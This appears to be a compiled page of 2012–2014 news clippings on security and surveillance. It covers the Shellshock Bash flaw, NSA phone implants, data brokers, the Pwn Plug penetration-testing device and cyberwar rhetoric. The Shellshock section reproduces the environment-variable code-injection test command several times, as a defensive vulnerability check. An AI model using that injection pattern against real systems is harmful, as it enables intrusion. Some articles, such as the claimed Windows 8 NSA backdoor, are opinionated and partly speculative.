$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 vulnerable
 this is a test

The patch used to fix this flaw, ensures that no code is allowed after the end of a Bash function. So if you run the above example with the patched version of Bash, you should get an output similar to:

 $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 bash: warning: x: ignoring function definition attempt
 bash: error importing function definition for `x'
 this is a test

We believe this should not affect any backward compatibility. This would, of course, affect any scripts which try to use environment variables created in the way as described above, but doing so should be considered a bad programming practice.

Red Hat has issued security advisories that fixes this issue for Red Hat Enterprise Linux. Fedora has also shipped packages that fixes this issue.

We have additional information regarding specific Red Hat products affected by this issue that can be found at https://access.redhat.com/site/solutions/1207723

Information on CentOS can be found at http://lists.centos.org/pipermail/centos/2014-September/146099.html.

>

[Sep 29, 2014] Shellshock: How to protect your Unix, Linux and Mac servers By Steven J. Vaughan-Nichols

Fortunately, all the major Linux vendors quickly issued patches, including Debian, Ubuntu, Suse and Red Hat.
zdnet.com

The only thing you have to fear with Shellshock, the Unix/Linux Bash security hole, is fear itself. Yes, Shellshock can serve as a highway for worms and malware to hit your Unix, Linux, and Mac servers, but you can defend against it.

The real and present danger is for servers. According to the National Institute of Standards (NIST), Shellshock scores a perfect 10 for potential impact and exploitability. Red Hat reports that the most common attack vectors are:

So much for Red Hat's thoughts. Of these, the Web servers and SSH are the ones that worry me the most. The DHCP client is also troublesome, especially if, as it the case with small businesses, your external router doubles as your Internet gateway and DHCP server.

Of these, Web server attacks seem to be the most common by far. As Florian Weimer, a Red Hat security engineer, wrote: "HTTP requests to CGI scripts have been identified as the major attack vector." Attacks are being made against systems running both Linux and Mac OS X.

Jaime Blasco, labs director at AlienVault, a security management services company, ran a honeypot looking for attackers and found "several machines trying to exploit the Bash vulnerability. The majority of them are only probing to check if systems are vulnerable. On the other hand, we found two worms that are actively exploiting the vulnerability and installing a piece of malware on the system."

Other security researchers have found that the malware is the usual sort. They typically try to plant distributed denial of service (DDoS) IRC bots and attempt to guess system logins and passwords using a list of poor passwords such as 'root', 'admin', 'user', 'login', and '123456.'

So, how do you know if your servers can be attacked? First, you need to check to see if you're running a vulnerable version of Bash. To do that, run the following command from a Bash shell:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If you get the result:

vulnerable this is a test

Bad news, your version of Bash can be hacked. If you see:

bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test

You're good. Well, to be more exact, you're as protected as you can be at the moment.

http://support.novell.com/security/cve/CVE-2014-6271.html

Updated information on the bash fixes.
Sep 26, 2014 | support.novell.com

We have fixed the critical issue CVE-2014-6271 (http://support.novell.com/security/cve/CVE-2014-6271.html) with updates for all supported and LTSS code streams.

SLES 10 SP3 LTSS, SP4 LTSS, SLES 11 SP1 LTSS, SLES 11 SP2 LTSS, SLES 11 SP3, openSUSE 12.3, 13.1.

The issue CVE-2014-7169 ( http://support.novell.com/security/cve/CVE-2014-7169.html) is less severe (no trivial code execution) but will also receive fixes for above. As more patches are under discussions around the bash parser, we will wait some days to collect them to avoid a third bash update.

[Jan 08, 2014] German Government CONFIRMS Key Entities Not To Use Windows 8 with TPM 2.0, Fearing Control by ‘Third Parties’ (Such As NSA) by Wolf Richter

08/26/2013 | www.testosteronepit.com

I expected the German Federal Office for Security in Information Technology (BSI) to contact me in an icily polite but firm manner and make me recant, and I almost expected some goons to show up with an offer I couldn’t refuse, and I half expected Microsoft to shut down my computers remotely and wipe out all my data and make me, as the Japanese say, cry into my pillow for weeks, or something. But none of that happened.

Instead, the BSI officially confirmed on its website the key statements in what has become my most popular article ever. On my humble site alone, it was read over 44,000 times so far, received over 2,090 Facebook “likes,” and was tweeted over 530 times. Here it is: LEAKED: German Government Warns Key Entities Not To Use Windows 8 – Links The NSA.

Internal documents from the BSI that were leaked to Die Zeit described how Windows 8 in conjunction with the new Trusted Platform Module (TPM 2.0) – “a special surveillance chip,” it has been called – allowed Microsoft to control computers remotely through a built-in backdoor without possibility for the user to opt in or opt out. The goal is Digital Rights Management and computer security. Through remote access via this backdoor, Microsoft determines what software is allowed to run on the computer, and what software, such as illegal copies or viruses and Trojans, should be disabled. Keys to that backdoor are likely accessible to the NSA – and in an ironic twist, perhaps even to the Chinese.

Users of Windows 8 with TPM 2.0 (the standard configuration and not an option) surrender control over their machine the moment they turn it on. For that reason, according to the leaked documents, experts at the BSI warned the German Federal Administration and other key users against deploying computers with Windows 8 and TPM 2.0.

The BSI could have brushed off these leaked documents as fakes or rumors, or whatnot. But instead, in response to “media reports,” it decided to clarify a few points on its website, and in doing so, confirmed the key elements. Here are the salient points:

For specific user groups, the use of Windows 8 in combination with TPM may well mean an increase in security. This includes users who, for various reasons, cannot or do not want to take care of the security of their system, but trust that the manufacturer of the system provides and maintains a secure solution. This is a valid user scenario, but the manufacturer should provide sufficient transparency about the potential limitations of the architecture and possible consequences of its use.

From the perspective of the BSI, the use of Windows 8 in combination with TPM 2.0 is accompanied by a loss of control over the operating system and the hardware. This results in new risks for the user, specifically for the Federal Administration and critical infrastructure.

It explains how “unintentional errors” could cause hardware and software to become permanently useless, which “would not be acceptable” for the Federal Administration or for other users. “In addition, the newly established mechanisms can also be used for sabotage by third parties.”

Among them: the NSA and possibly the Chinese.

The BSI considers complete control over the information technology – including a conscious opt-in and later the possibility of an opt-out – a fundamental condition for a responsible use of hardware and operating system.

Since these conditions have not been met, the BSI has warned the “Federal Administration and critical infrastructure users” not to use the Windows 8 with TPM 2.0. The BSI said that it remained in contact with the Trusted Computing Group as well as with makers of operating systems and hardware “in order to find appropriate solutions” (whole text in German).

This alleged connection between Windows and the NSA isn’t new. Geeks have for years tried to document how Microsoft has been cooperating with the NSA and other members of the US Intelligence Community in designing its operating systems. For example, rumors bubbled up in 2007 that computers with Vista, at the time Microsoft’s latest and greatest (and much despised) operating system, automatically established a connection to, among others, the Department of Defense Information Center and Halliburton Company, back then the Darth Vader of Corporate America.

The Windows 8 debacle comes on top of the breathless flow of Edward Snowden’s revelations and paint a much more detailed picture of how the NSA’s spying activities are dependent on Corporate America. These revelations are already slamming tech companies [my take: US Tech Companies Raked Over The Coals In China ] as they find it harder to sell their allegedly compromised products overseas. Which foreign government or corporation would now want to use Windows 8 with TPM 2.0?

Or is this – and the entire hullabaloo about the Snowden revelations – just another item in the governmental and corporate category of “This Too Shall Pass?” The answer lies in this paragraph:

No laws define the limits of the NSA’s power. No Congressional committee subjects the agency’s budget to a systematic, informed and skeptical review. With unknown billions of Federal dollars, the agency purchases the most sophisticated communications and computer equipment in the world. But truly to comprehend the growing reach of this formidable organization, it is necessary to recall once again how the computers that power the NSA are also gradually changing lives of Americans....

The year? Not 2013. But thirty years ago.

It was published by the New York Times in 1983, adapted from David Burnham’s book, The Rise of the Computer State [brought to my attention by @mark_white0]. And we’re still going down the same road. Only now, we’re a lot further along. No wonder that tech companies, government agencies, and Congress alike think that this too shall pass. Because it has always done so before.

So, here is my offending article: LEAKED: German Government Warns Key Entities Not To Use Windows 8 – Links The NSA.

Author webpage: www.amazon.com/author/wolfrichter

[Jan 08, 2014] Apple Says It Is ‘Unaware’ of N.S.A. iPhone Hack Program By NICOLE PERLROTH

"It can also turn the iPhone into a “hot mic” using the phone’s own microphone as a recording device and capture images via the iPhone’s camera. (Reminder to readers: Masking tape is not a bad idea)."

Dec 31, 2013 | NYT

The agency described DROPOUTJEEP as a “software implant for Apple iPhone” that has all kinds of handy spy capabilities. DROPOUTJEEP can pull or push information onto the iPhone, snag SMS text messages, contact lists, voicemail and a person’s geolocation, both from the phone itself and from cell towers in close proximity.

It can also turn the iPhone into a “hot mic” using the phone’s own microphone as a recording device and capture images via the iPhone’s camera. (Reminder to readers: Masking tape is not a bad idea).

But the Der Spiegel report is based on information that is over five years old. The slide, dated January 2007 and last updated October 2008, claims that the agency requires close physical proximity to the iPhone to install DROPOUTJEEP.

“The initial release of DROPOUTJEEP will focus on installing the implant via close access methods,” the N.S.A. slide says. Then, “A remote installation capability will be pursued for a future release.”

Based on the timing of the report, the agency would have been targeting Apple’s iOS5 operating system. Apple released its latest iOS7 operating system last September.

[Dec 27, 2013] N.S.A. Phone Surveillance Is Lawful, Federal Judge Rules

In one of the concurrences, Justice Sonia Sotomayor wrote that “it may be necessary to reconsider the premise that an individual has no reasonable expectation of privacy in information voluntarily disclosed to third parties.”
NYTimes.com

The main dispute between Judge Pauley and Judge Leon was over how to interpret a 1979 Supreme Court decision, Smith v. Maryland, in which the court said a robbery suspect had no reasonable expectation that his right to privacy extended to the numbers dialed from his phone.

“Smith’s bedrock holding is that an individual has no legitimate expectation of privacy in information provided to third parties,” Judge Pauley wrote.

But Judge Leon said in his ruling that advances in technology and suggestions in concurring opinions in later Supreme Court decisions had undermined Smith. The government’s ability to construct a mosaic of information from countless records, he said, called for a new analysis of how to apply the Fourth Amendment’s prohibition of unreasonable government searches.

Judge Pauley disagreed. “The collection of breathtaking amounts of information unprotected by the Fourth Amendment does not transform that sweep into a Fourth Amendment search,” he wrote.

He acknowledged that “five justices appeared to be grappling with how the Fourth Amendment applies to technological advances” in a pair of 2012 concurrences in United States v. Jones. In that decision, the court unanimously rejected the use of a GPS device to track the movements of a drug suspect over a month. The majority in the 2012 case said that attaching the device violated the defendant’s property rights.

In one of the concurrences, Justice Sonia Sotomayor wrote that “it may be necessary to reconsider the premise that an individual has no reasonable expectation of privacy in information voluntarily disclosed to third parties.”

But Judge Pauley wrote that the 2012 decision did not overrule the one from 1979. “The Supreme Court,” he said, “has instructed lower courts not to predict whether it would overrule a precedent even if its reasoning has been supplanted by later cases.”

As for changes in technology, he wrote, customers’ “relationship with their telecommunications providers has not changed and is just as frustrating.”

[Dec 27, 2013] What Surveillance Valley knows about you By Yasha Levine

December 22, 2013 Crooks and Liars

“In 2012, the data broker industry generated 150 billion in revenue that’s twice the size of the entire intelligence budget of the United States government—all generated by the effort to detail and sell information about our private lives.”
Senator Jay Rockefeller IV

“Quite simply, in the digital age, data-driven marketing has become the fuel on which America’s free market engine runs.”

Direct Marketing Association

* * *

Google is very secretive about the exact nature of its for-profit intel operation and how it uses the petabytes of data it collects on us every single day for financial gain. Fortunately, though, we can get a sense of the kind of info that Google and other Surveillance Valley megacorps compile on us, and the ways in which that intel might be used and abused, by looking at the business practices of the “data broker” industry.

Thanks to a series of Senate hearings, the business of data brokerage is finally being understood by consumers, but the industry got its start back in the 1970s as a direct outgrowth of the failure of telemarketing. In its early days, telemarketing had an abysmal success rate: only 2 percent of people contacted would become customers. In his book, “The Digital Perso,” Daniel J. Solove explains what happened next:

To increase the low response rate, marketers sought to sharpen their targeting techniques, which required more consumer research and an effective way to collect, store, and analyze information about consumers. The advent of the computer database gave marketers this long sought-after ability — and it launched a revolution in targeting technology.

Data brokers rushed in to fill the void. These operations pulled in information from any source they could get their hands on — voter registration, credit card transactions, product warranty information, donations to political campaigns and non-profits, court records — storing it in master databases and then analyzing it in all sorts of ways that could be useful to direct-mailing and telemarketing outfits. It wasn’t long before data brokers realized that this information could be used beyond telemarketing, and quickly evolved into a global for-profit intelligence business that serves every conceivable data and intelligence need.

Today, the industry churns somewhere around $200 billion in revenue annually. There are up to 4,000 data broker companies — some of the biggest are publicly traded — and together, they have detailed information on just about every adult in the western world.

No source of information is sacred: transaction records are bought in bulk from stores, retailers and merchants; magazine subscriptions are recorded; food and restaurant preferences are noted; public records and social networks are scoured and scraped. What kind of prescription drugs did you buy? What kind of books are you interested in? Are you a registered voter? To what non-profits do you donate? What movies do you watch? Political documentaries? Hunting reality TV shows?

That info is combined and kept up to date with address, payroll information, phone numbers, email accounts, social security numbers, vehicle registration and financial history. And all that is sliced, isolated, analyzed and mined for data about you and your habits in a million different ways.

The dossiers are not restricted to generic market segmenting categories like “Young Literati” or “Shotguns and Pickups” or “Kids & Cul-de-Sacs,” but often contain the most private and intimate details about a person’s life, all of it packaged and sold over and over again to anyone willing to pay.

Take MEDbase200, a boutique for-profit intel outfit that specializes in selling health-related consumer data. Well, until last week, the company offered its clients a list of rape victims (or “rape sufferers,” as the company calls them) at the low price of $79.00 per thousand. The company claims to have segmented this data set into hundreds of different categories, including stuff like the ailments they suffer, prescription drugs they take and their ethnicity:

These rape sufferers are family members who have reported, or have been identified as individuals affected by specific illnesses, conditions or ailments relating to rape. Medbase200 is the owner of this list. Select from families affected by over 500 different ailments, and/or who are consumers of over 200 different Rx medications. Lists can be further selected on the basis of lifestyle, ethnicity, geo, gender, and much more. Inquire today for more information.

MEDbase promptly took its “rape sufferers” list off line last week after its existence was revealed in a Senate investigation into the activities of the data-broker industry. The company pretended like the list was a huge mistake. A MEDbase rep tried convincing a Wall Street Journal reporter that its rape dossiers were just a “hypothetical list of health conditions/ailments.” The rep promised it was never sold to anyone. Yep, it was a big mistake. We can all rest easy now. Thankfully, MEDbase has hundreds of other similar dossier collections, hawking the most private and sensitive medical information.

For instance, if lists of rape victims aren’t your thing, MEDbase can sell dossiers on people suffering from anorexia, substance abuse, AIDS and HIV, Alzheimer’s Disease, Asperger Disorder, Attention Deficit Hyperactivity Disorder, Bedwetting (Enuresis), Binge Eating Disorder, Depression, Fetal Alcohol Syndrome, Genital Herpes, Genital Warts, Gonorrhea, Homelessness, Infertility, Syphilis… the list goes on and on and on and on.

Normally, such detailed health information would fall under federal law and could not be disclosed or sold without consent. But because these data harvesters rely on indirect sources of information instead of medical records, they’re able to sidestep regulations put in place to protect the privacy of people’s health data.

MEBbase isn’t the only company exploiting these loopholes. By the industry’s own estimates, there are something like 4,000 for-profit intel companies operating in the United States. Many of them sell information that would normally be restricted under federal law. They offer all sorts of targeted dossier collections on every population segments of our society, from the affluent to the extremely vulnerable:

If you want to see how this kind of profile data can be used to scam unsuspecting individuals, look no further than a Richard Guthrie, an Iowa retiree who had his life savings siphoned out of his bank account. Their weapon of choice: databases bought from large for-profit data brokers listing retirees who entered sweepstakes and bought lottery tickets.

Here’s a 2007 New York Times story describing the racket:

Mr. Guthrie, who lives in Iowa, had entered a few sweepstakes that caused his name to appear in a database advertised by infoUSA, one of the largest compilers of consumer information. InfoUSA sold his name, and data on scores of other elderly Americans, to known lawbreakers, regulators say.

InfoUSA advertised lists of “Elderly Opportunity Seekers,” 3.3 million older people “looking for ways to make money,” and “Suffering Seniors,” 4.7 million people with cancer or Alzheimer’s disease. “Oldies but Goodies” contained 500,000 gamblers over 55 years old, for 8.5 cents apiece. One list said: “These people are gullible. They want to believe that their luck can change.”

Data brokers argue that cases like Guthrie are an anomaly — a once-in-a-blue-moon tragedy in an industry that takes privacy and legal conduct seriously. But cases of identity thieves and sophistical con-rings obtaining data from for-profit intel businesses abound. Scammers are a lucrative source of revenue. Their money is just as good as anyone else’s. And some of the profile “products” offered by the industry seem tailored specifically to fraud use.

As Royal Canadian Mounted Police Sergeant Yves Leblanc told the New York Times: “Only one kind of customer wants to buy lists of seniors interested in lotteries and sweepstakes: criminals. If someone advertises a list by saying it contains gullible or elderly people, it’s like putting out a sign saying ‘Thieves welcome here.’”

So what is InfoUSA, exactly? What kind of company would create and sell lists customized for use by scammers and cons?

As it turns out, InfoUSA is not some fringe or shady outfit, but a hugely profitable politically connected company. InfoUSA was started by Vin Gupta in the 1970s as a basement operation hawking detailed lists of RV and mobile home dealers. The company quickly expanded into other areas and began providing business intel services to thousands of businesses. By 2000, the company raised more than $30 million in venture capital funding from major Silicon Valley venture capital firms.

By then, InfoUSA boasted of having information on 230 million consumers. A few years later, InfoUSA counted the biggest Valley companies as its clients, including Google, Yahoo, Microsoft and AOL. It got involved not only in raw data and dossiers, but moved into payroll and financial, conducted polling and opinion research, partnered with CNN, vetted employees and provided customized services for law enforcement and all sorts of federal and government agencies: processing government payments, helping states locate tax cheats and even administrating President Bill Clinton “Welfare to Work” program. Which is not surprising, as Vin Gupta is a major and close political supporter of Bill and Hillary Clinton.

In 2008, Gupta was sued by InfoUSA shareholders for inappropriately using corporate funds. Shareholders accused of Gupta of illegally funneling corporate money to fund an extravagant lifestyle and curry political favor. According to the Associated Press, the lawsuit questioned why Gupta used private corporate jets to fly the Clintons on personal and campaign trips, and why Gupta awarded Bill Clinton a $3.3 million consulting gig.

As a result of the scandal, InfoUSA was threatened with delisting from Nasdaq, Gupta was forced out and the company was snapped up for half a billion dollars by CCMP Capital Advisors, a major private equity firm spun off from JP Morgan in 2006. Today, InfoUSA continues to do business under the name Infogroup, and has nearly 4,000 employees working in nine countries.

As big as Infogroup is, there are dozens of other for-profit intelligence businesses that are even bigger: massive multi-national intel conglomerates with revenues in the billions of dollars. Some of them, like Lexis-Nexis and Experian, are well known, but mostly these are outfits that few Americans have heard of, with names like Epsilon, Altegrity and Acxiom.

These for-profit intel behemoths are involved in everything from debt collection to credit reports to consumer tracking to healthcare analysis, and provide all manner of tailored services to government and law enforcement around the world. For instance, Acxiom has done business with most major corporations, and boasts of intel on “500 million active consumers worldwide, with about 1,500 data points per person. That includes a majority of adults in the United States,” according to the New York Times.

This data is analyzed and sliced in increasingly sophisticated and intrusive ways to profile and predict behavior. Merchants are using it customize shopping experience— Target launched a program to figure out if a woman shopper was pregnant and when the baby would be born, “even if she didn’t want us to know.” Life insurance companies are experimenting with predictive consumer intel to estimate life expectancy and determine eligibility for life insurance policies. Meanwhile, health insurance companies are raking over this data in order to deny and challenge the medical claims of their policyholders.

Even more alarming, large employers are turning to for-profit intelligence to mine and monitor the lifestyles and habits of their workers outside the workplace. Earlier this year, the Wall Street Journal described how employers have partnered with health insurance companies to monitor workers for “health-adverse” behavior that could lead to higher medical expenses down the line:

Your company already knows whether you have been taking your meds, getting your teeth cleaned and going for regular medical checkups. Now some employers or their insurance companies are tracking what staffers eat, where they shop and how much weight they are putting on — and taking action to keep them in line.

But companies also have started scrutinizing employees’ other behavior more discreetly. Blue Cross and Blue Shield of North Carolina recently began buying spending data on more than 3 million people in its employer group plans. If someone, say, purchases plus-size clothing, the health plan could flag him for potential obesity — and then call or send mailings offering weight-loss solutions.

…”Everybody is using these databases to sell you stuff,” says Daryl Wansink, director of health economics for the Blue Cross unit. “We happen to be trying to sell you something that can get you healthier.”

“As an employer, I want you on that medication that you need to be on,” says Julie Stone, a HR expert at Towers Watson told the Wall Street Journal.

Companies might try to frame it as a health issue. I mean, what kind of asshole could be against employers caring about the wellbeing of their workers? But their ultimate concern has nothing to do with the employee health. It’s all about the brutal bottom line: keeping costs down.

An employer monitoring and controlling your activity outside of work? You don’t have to be union agitator to see the problems with this kind of mindset and where it could lead. Because there are lots of things that some employers might want to know about your personal life, and not only to “keep costs down.” It could be anything: to weed out people based on undesirable habits or discriminate against workers based on sexual orientation, regulation and political beliefs.

It’s not difficult to imagine that a large corporation facing a labor unrest or a unionization drive would be interested in proactively flagging potential troublemakers by pinpointing employees that might be sympathetic to the cause. But the technology and data is already here for wide and easy application: did a worker watch certain political documentaries, donate to environmental non-profits, join an animal rights Facebook group, tweet out support for Occupy Wall Street, subscribe to the Nation or Jacobin, buy Naomi Klein’s “Shock Doctrine”? Or maybe the worker simply rented one of Michael Moore’s films? Run your payroll through one of the massive consumer intel databases and look if there is any matchup. Bound to be plenty of unpleasant surprises for HR!

This has happened in the past, although in a cruder and more limited way. In the 1950s, for instance, some lefty intellectuals had their lefty newspapers and mags delivered to P.O. boxes instead of their home address, worrying that otherwise they’d get tagged as Commie symps. That might have worked in the past. But with the power of private intel companies, today there’s nowhere to hide.

FTC Commissioner Julie Brill has repeatedly voiced concern that unregulated data being amassed by for-profit intel companies would be used to discriminate and deny employment, and to determine consumer access to everything from credit to insurance to housing. “As Big Data algorithms become more accurate and powerful, consumers need to know a lot more about the ways in which their data is used,” she told the Wall Street Journal.

Pam Dixon, executive director of the Privacy World Forum, agrees. Dixon frequently testifies on Capitol Hill to warn about the growing danger to privacy and civil liberties posed by big data and for-profit intelligence. In Congressional testimony back in 2009, Dixon called this growing mountain of data the “modern permanent record” and explained that users of these new intel capabilities will inevitably expand to include not just marketers and law enforcement, but insurance companies, employers, landlords, schools, parents, scammers and stalkers. “The information – like credit reports – will be used to make basic decisions about the ability of individual to travel, participate in the economy, find opportunities, find places to live, purchase goods and services, and make judgments about the importance, worthiness, and interests of individuals.”

* * *

For the past year, Chairman John D. (Jay) Rockefeller IV has been conducting a Senate Commerce Committee investigation of the data broker industry and how it affects consumers. The committee finished its investigation last week without reaching any real conclusions, but issued a report warning about the dangers posed by the for-profit intel industry and the need for further action by lawmakers. The report noted with concern that many of these firms failed to cooperate with the investigation into their business practices:

Data brokers operate behind a veil of secrecy. Three of the largest companies – Acxiom, Experian, and Epsilon – to date have been similarly secretive with the Committee with respect to their practices, refusing to identify the specific sources of their data or the customers who purchase it. … The refusal by several major data broker companies to provide the Committee complete responses regarding data sources and customers only reinforces the aura of secrecy surrounding the industry.

Rockefeller’s investigation was an important first step breaking open this secretive industry, but it was missing one notable element. Despite its focus on companies that feed on people’s personal data, the investigation did not include Google or the other big Surveillance Valley data munchers. And that’s too bad. Because if anything, the investigation into data brokers only highlighted the danger posed by the consumer-facing data companies like Google, Facebook, Yahoo and Apple.

As intrusive as data brokers are, the level of detail in the information they compile on Americans pales to what can be vacuumed up by a company like Google. To compile their dossiers, traditional data brokers rely on mostly indirect intel: what people buy, where they vacation, what websites they visit. Google, on the other hand, has access to the raw uncensored contents of your inner life: personal emails, chats, the diary entries and medical records that we store in the cloud, our personal communication with doctors, lawyers, psychologists, friends. Data brokers know us through our spending habits. Google accesses the unfiltered details of our personal lives.

A recent study showed that Americans are overwhelmingly opposed to having their online activity tracked and analyzed. Seventy-three percent of people polled for the Pew Internet & American Life Project viewed the tracking of their search history as an invasion of privacy, while 68 percent were against targeted advertising, replying: “I don’t like having my online behavior tracked and analyzed.”

This isn’t news to companies like Google, which last year warned shareholders: “Privacy concerns relating to our technology could damage our reputation and deter current and potential users from using our products and services.”

Little wonder then that Google, and the rest of Surveillance Valley, is terrified that the conversation about surveillance could soon broaden to include not only government espionage, but for-profit spying as well.

[Jul 23, 2012] The Onion Facebook Is CIA's Dream Come True [SATIRE] by Stan Schroeder

Compare with Assange- Facebook, Google, Yahoo spying tools for US intelligence

As the “single most powerful tool for population control,” the CIA’s “Facebook program” has dramatically reduced the agency’s costs — at least according to the latest “report” from the satirical mag The Onion.

Perhaps inspired by a recent interview with WikiLeaks founder Julian Assange, who called Facebook “the most appalling spy machine that has ever been invented,” The Onion‘s video fires a number of arrows in Facebook’s direction — with hilarious results.

In the video, Facebook founder Mark Zuckerberg is dubbed “The Overlord” and is shown receiving a “medal of intelligence commendation” for his work with the CIA’s Facebook program.

The Onion also takes a jab at FarmVille (which is responsible for “pacifying” as much as 85 million people after unemployment rates rose), Twitter (which is called useless as far as data gathering goes), and Foursquare (which is said to have been created by Al Qaeda).

Check out the video below and tell us in the comments what you think.

CIA's 'Facebook' Program Dramatically Cut Agency's Costs Onion News Network

[Apr 17, 2012] The Pwn Plug is a little white box that can hack your network By Robert McMillan,

wired.com

The Pwn Plug is a little white box that can hack your network

Easy to overlook, the PwnPlug offers a tiny back door to the corporate network

When Jayson E. Street broke into the branch office of a national bank in May of last year, the branch manager could not have been more helpful. Dressed like a technician, Street walked in and said he was there to measure "power fluctuations on the power circuit." To do this, he'd need to plug a small white device that looked like a power adapter onto the wall.

The power fluctuation story was total BS, of course. Street had been hired by the bank to test out security at 10 of its West Coast branch offices. He was conducting what's called a penetration test. This is where security experts pretend to be bad guys in order to spot problems.

In this test, bank employees were only too willing to help out. They let Street go anywhere he wanted—near the teller windows, in the vault—and plug in his little white device, called a Pwn Plug.

"At one branch, the bank manager got out of the way so I could put it behind her desk," Street says. The bank, which Street isn't allowed to name, called the test off after he'd broken into the first four branches. "After the fourth one they said, 'Stop now please. We give up.'"

Built by a startup company called Pwnie Express, the Pwn Plug is pretty much the last thing you ever want to find on your network—unless you've hired somebody to put it there. It's a tiny computer that comes preloaded with an arsenal of hacking tools. It can be quickly plugged into any computer network and then used to access it remotely from afar. And it comes with "stealthy decal stickers"—including a little green flowerbud with the word "fresh" underneath it, that makes the device look like an air freshener—so that people won't get suspicious.

The Pwn Plug installed during Street's May penetration test

The Pwn Plug installed during Street's May penetration test

Jayson E. Street

The basic model costs $480, but if you're willing to pay an extra $250 for the Elite version, you can connect it over the mobile wireless network. "The whole point is plug and pwn," says Dave Porcello, Pwnie Express's CEO. "Walk into a facility, plug it in, wait for the text message. Before you even get to the parking lot you should know it's working."

Porcello decided to start making the Pwn Plug after coming across the SheevaPlug, a miniature low-power Linux computer built by Globalscale Technologies that looks just like a power adapter. "I saw it and I was like, 'Oh my god this is the hacker's dropbox,'" Porcello says. Dropboxes have been around for a few decades, but until now they've been customized computers that hackers or pen testers like Street build and sneak, unobserved onto corporate networks.

Now Pwnie Express has taken the idea commercial and built a product that anyone can easily configure and use. It turns out that they're also a great way for corporations to test out security at their regional offices. Porcellos says that the Bank of America is mailing the Pwn Plug to its regional offices and having bank mangers plug them into the network. Then security experts at corporate HQ can check the network for vulnerabilities.

Another Internet service provider—Porcello wasn't allowed to name it—is using the devices to remotely connect to regional offices via a GSM mobile wireless network and troubleshoot networking problems.

The device can save companies big money, Porcello says. "You've got companies like T.J.Maxx that have thousands of retail stores and every single one of them has got a computer network," he says. "Right now they're actually flying people out to the stores to spot check and do penetration basis, but now with something like this you don't have to travel."

Porcello was just a bored security manager at an insurance company when he started building the Pwn Plugs back in 2010. But pretty soon he was selling enough to quit his day job. "We started getting orders from Fortune 50 companies and the DoD and I was like, 'OK I'll do this now instead.'"

[Feb 15, 2012] Cyberwar Is the New Yellowcake Threat Level By Jerry Brito and Tate Watkins

Now all this needs to reassessed using latest NSA revelations...
February 14, 2012 | Wired.com

In last month’s State of the Union address, President Obama called on Congress to pass “legislation that will secure our country from the growing dangers of cyber threats.” The Hill was way ahead of him, with over 50 cybersecurity bills introduced this Congress. This week, both the House and Senate are moving on their versions of consolidated, comprehensive legislation.

The reason cybersecurity legislation is so pressing, proponents say, is that we face an immediate risk of national disaster.

“Today’s cyber criminals have the ability to interrupt life-sustaining services, cause catastrophic economic damage, or severely degrade the networks our defense and intelligence agencies rely on,” Senate Commerce Committee Chairman Jay Rockefeller (D-W.Va.) said at a hearing last week. “Congress needs to act on comprehensive cybersecurity legislation immediately.”

Yet evidence to sustain such dire warnings is conspicuously absent. In many respects, rhetoric about cyber catastrophe resembles threat inflation we saw in the run-up to the Iraq War. And while Congress’ passing of comprehensive cybersecurity legislation wouldn’t lead to war, it could saddle us with an expensive and overreaching cyber-industrial complex.

In 2002 the Bush administration sought to make the case that Iraq threatened its neighbors and the United States with weapons of mass destruction (WMD). By framing the issue in terms of WMD, the administration conflated the threats of nuclear, biological, and chemical weapons. The destructive power of biological and chemical weapons—while no doubt horrific—is minor compared to that of nuclear detonation. Conflating these threats, however, allowed the administration to link the unlikely but serious threat of a nuclear attack to the more likely but less serious threat posed by biological and chemical weapons.

Similarly, proponents of regulation often conflate cyber threats.

In his 2010 bestseller Cyber War, Richard Clarke warns that a cyberattack today could result in the collapse of the government’s classified and unclassified networks, the release of “lethal clouds of chlorine gas” from chemical plants, refinery fires and explosions across the country, midair collisions of 737s, train derailments, the destruction of major financial computer networks, suburban gas pipeline explosions, a nationwide power blackout, and satellites in space spinning out of control. He assures us that “these are not hypotheticals.” But the only verifiable evidence he presents relates to several well-known distributed denial of service (DDOS) attacks, and he admits that DDOS is a “primitive” form of attack that would not pose a major threat to national security.

When Clarke ventures beyond DDOS attacks, his examples are easily debunked. To show that the electrical grid is vulnerable, for example, he suggests that the Northeast power blackout of 2003 was caused in part by the “Blaster” worm. But the 2004 final report of the joint U.S.-Canadian task force that investigated the blackout found that no virus, worm, or other malicious software contributed to the power failure. Clarke also points to a 2007 blackout in Brazil, which he says was the result of criminal hacking of the power system. Yet investigations have concluded that the power failure was the result of soot deposits on high-voltage insulators on transmission lines.

Clarke’s readers would no doubt be as frightened at the prospect of a cyber attack as they might have been at the prospect of Iraq passing nuclear weapons to al Qaeda. Yet evidence that cyberattacks and cyberespionage are real and serious concerns is not evidence that we face a grave risk of national catastrophe, just as evidence of chemical or biological weapons is not evidence of the ability to launch a nuclear strike.

The Bush administration claimed that Iraq was close to acquiring nuclear weapons but provided no verifiable evidence. The evidence they did provide—Iraq’s alleged pursuit of uranium “yellowcake” from Niger and its purchase of aluminum tubes allegedly meant for uranium enrichment centrifuges—was ultimately determined to be unfounded.

Despite the lack of verifiable evidence to support the administration’s claims, the media tended to report them unquestioned. Initial reporting on the aluminum tubes claim, for example, came in the form of a front page New York Times article by Judith Miller and Michael Gordon that relied entirely on anonymous administration sources.

Appearing on Meet the Press the same day the story was published, Vice President Dick Cheney answered a question about evidence of a reconstituted Iraqi nuclear program by stating that, while he couldn’t talk about classified information, The New York Times was reporting that Iraq was seeking to acquire aluminum tubes to build a centrifuge. In essence, the Bush administration was able to cite its own leak—with the added imprimatur of the Times—as a rationale for war.

The media may be contributing to threat inflation today by uncritically reporting alarmist views of potential cyber threats. For example, a 2009 front page Wall Street Journal story reported that the U.S. power grid had been penetrated by Chinese and Russian hackers and laced with logic bombs. The article is often cited as evidence that the power grid is rigged to blow.

Yet similar to Judith Miller’s Iraq WMD reporting, the only sources for the article’s claim that infrastructure has been compromised are anonymous U.S. intelligence officials. With little specificity about the alleged infiltrations, readers are left with no way to verify the claims. More alarmingly, when Sen. Susan Collins (R-Maine) took to the Senate floor to introduce the comprehensive cybersecurity bill that she co-authored with Sen. Joe Lieberman (I-Conn.), the evidence she cited to support a pressing need for regulation included this very Wall Street Journal story.

